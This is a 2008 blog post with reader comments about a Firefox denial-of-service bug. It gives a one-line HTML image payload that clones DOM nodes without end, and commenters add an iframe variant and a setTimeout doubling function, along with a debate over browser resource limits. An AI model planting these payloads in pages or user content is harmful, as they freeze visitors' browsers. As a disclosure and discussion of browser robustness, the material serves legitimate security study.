DOM DOS Firefox
Wednesday, 9 January 2008
Check out this DoS in Firefox:
<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">
There are many DOM related Firefox problems, this was one of the more interesting ones I found 🙂
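For the curious: inside an inline event handler the element itself is on the scope chain, so the bare `cloneNode` and `appendChild` calls resolve against the `<img>`. Each deep clone carries the same empty `src` and the same `onerror` handler, so every clone appended to the document fires a fresh error event of its own. A rough model of that growth (a sketch only, not real DOM code — it just assumes each handler spawns two new failing images, one per `cloneNode` call in the payload):

```javascript
// Rough model of the payload's growth, assuming each error handler
// appends two clones that each fire their own error event in turn.
function nodesAfter(generations) {
  let pending = 1; // the original <img> whose empty src fails to load
  let total = 1;
  for (let g = 0; g < generations; g++) {
    const spawned = pending * 2; // two cloneNode calls per handler
    total += spawned;
    pending = spawned; // every new clone fires onerror as well
  }
  return total;
}
```

Twenty generations of this model already predict over two million nodes, which fits the 100% CPU reports in the comments.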
The entry 'DOM DOS Firefox' was posted
on January 9th, 2008 at 9:56 pm
and last modified on August 27th, 2009 at 2:50 pm, and is filed under dos, Firefox, Security.
No. 1 — January 9th, 2008 at 10:24 pm
Why is this a problem exactly? There are lots of ways to trivially create exponential-growth algorithms in JS; this is just one example.
Put another way, malicious JS-based DOS is not exactly something that’s news. It’s easy. Browsers aren’t even trying to really prevent it.
No. 2 — January 9th, 2008 at 11:15 pm
Browsers should be.
No. 3 — January 9th, 2008 at 11:23 pm
Gareth, how do you tell a malicious page from a resource-hog “rich internet application” like google spreadsheets? They behave nearly identically.
If you have a magiv author-mind-reading device, I’d love to buy one from you.
No. 4 — January 9th, 2008 at 11:23 pm
That should have been “magic”, not “magiv”.
No. 5 — January 10th, 2008 at 12:05 am
confirmed here: FF 2.0.0.11
complete freeze and CPU = 100% in 5 seconds.
No. 6 — January 10th, 2008 at 2:05 am
@Boris
You are talking rubbish. I like to hack things, and you shouldn’t be able to crash the browser just by visiting a web page. If you don’t like what I write then please visit Fox News instead; they should provide you with the “news” you’re looking for.
Now please go and troll somewhere else.
No. 7 — January 10th, 2008 at 7:55 am
I agree with Gareth here. At least Opera doesn’t keep eating memory. Both FF 2 and FF3 beta have this problem.
No. 8 — January 10th, 2008 at 7:57 am
Gareth, I’m not sure why disagreement with you is automatically classified as trolling.
“you shouldn’t be able to make the browser crash when visiting a web page” would be nice, but in practice it’s easy to cause runaway resource usage in all sorts of different ways. And telling apart runaway resource usage from a resource-intensive webapp involves reading the script author’s mind, in general.
Now perhaps browsers should be able to impose CPU/memory quotas on sites. That’s being thought about, but it’s not so easy to retrofit onto an existing browser; you really want to design with that in mind. Sadly, no one did.
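In spirit, the per-site quota Boris describes might look like this (a hypothetical sketch; no browser exposed anything like it at the time, and the names and numbers here are invented for illustration):

```javascript
// Hypothetical per-page operation budget, invented for illustration.
// Pages "charge" the budget for expensive work; once the limit is hit,
// further work is refused instead of the whole browser locking up.
function makeBudget(limit) {
  let used = 0;
  return function charge(cost) {
    used += cost || 1;
    if (used > limit) {
      throw new Error('resource quota exceeded');
    }
  };
}

const charge = makeBudget(3);
charge(1); // fine
charge(1); // fine
charge(1); // fine: exactly at the limit
// one more charge(1) would throw 'resource quota exceeded'
```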
No. 9 — January 10th, 2008 at 9:18 am
@Boris
I like having sensible discussions but comparing ajax applications to the code sample is silly. Browsers should protect against this stuff! Opera for example has a much better security model than Firefox.
No. 10 — January 10th, 2008 at 9:57 am
Gareth: are you using Opera? or something else
No. 11 — January 10th, 2008 at 10:26 am
Firefox is my weapon of choice, mainly because of the plugins. Opera is a better browser, though.
No. 12 — January 10th, 2008 at 4:12 pm
I tried this variant:
<iframe src="" onload="appendChild(cloneNode(appendChild(cloneNode(1))))">
And it used full CPU on FF2, Opera, and FF3 beta, though Opera remained fairly responsive so I could close the tab. FF2 froze quickly. FF3 was unresponsive but did not freeze after about 15 seconds so I could still close the tab, though it took several seconds to actually close it.
Firefox does give you a prompt for scripts that take longer than usual to execute (like applying DHTML effects via the DOM on a huge page), but this DoS is of a different nature.
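(For reference, the threshold behind that prompt is a preference: Firefox shows the “unresponsive script” dialog once a script has run for `dom.max_script_run_time` seconds, 10 by default. It doesn’t catch this DoS because the damage is done by a storm of short event handlers rather than one long-running script.)

```
// user.js / about:config — pref behind the slow-script prompt (default 10)
user_pref("dom.max_script_run_time", 10);
```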
(and SpamBam doesn’t seem to like FF3 😉)
No. 13 — January 10th, 2008 at 4:22 pm
Thanks for the info, Zach. I’ll fix SpamBam when I get a minute, cheers.
No. 14 — January 10th, 2008 at 6:40 pm
Gareth, Zach’s testcase is a good example of what I was saying: there are many many ways to cause exponential growth. Try this one:
function f() {
  // append a node, then schedule two more calls to f: the number of
  // pending timeouts doubles on every pass
  document.body.appendChild(document.createElement('div'));
  setTimeout(f, 0);
  setTimeout(f, 0);
}
f();
And I’ve seen ajax applications that had more or less this exact code, cutting off the recursion after some point. The problem is telling on the browser side whether they plan to do that or not (if wanting to only block malicious pages). Of course imposing resource limits in general would work, but it would also limit the scope of what webapps can do. That might be a good thing, of course.
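The cut-off Boris mentions is easy to sketch. Purely for illustration (the cap and the `schedule` stand-in are invented so the snippet runs outside a browser), a bounded version of his example looks like:

```javascript
// Bounded variant of the doubling pattern: a well-behaved app stops once
// it has done enough work; the malicious version simply never stops.
const MAX_NODES = 1000; // invented cap, standing in for an app's real limit
let created = 0;

function f(schedule) {
  if (created >= MAX_NODES) return; // the cut-off that makes it benign
  created += 1;                     // stands in for appendChild(...)
  schedule(f);                      // stands in for setTimeout(f, 0)
  schedule(f);                      // without the cap, this doubles forever
}

const runNow = fn => fn(runNow); // synchronous stand-in for the event loop
f(runNow);
// created is now capped at MAX_NODES instead of growing without bound
```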
No. 15 — January 10th, 2008 at 7:23 pm
Yep another good example, browsers should protect against this stuff. Firefox already does to some extent but obviously it needs to improve.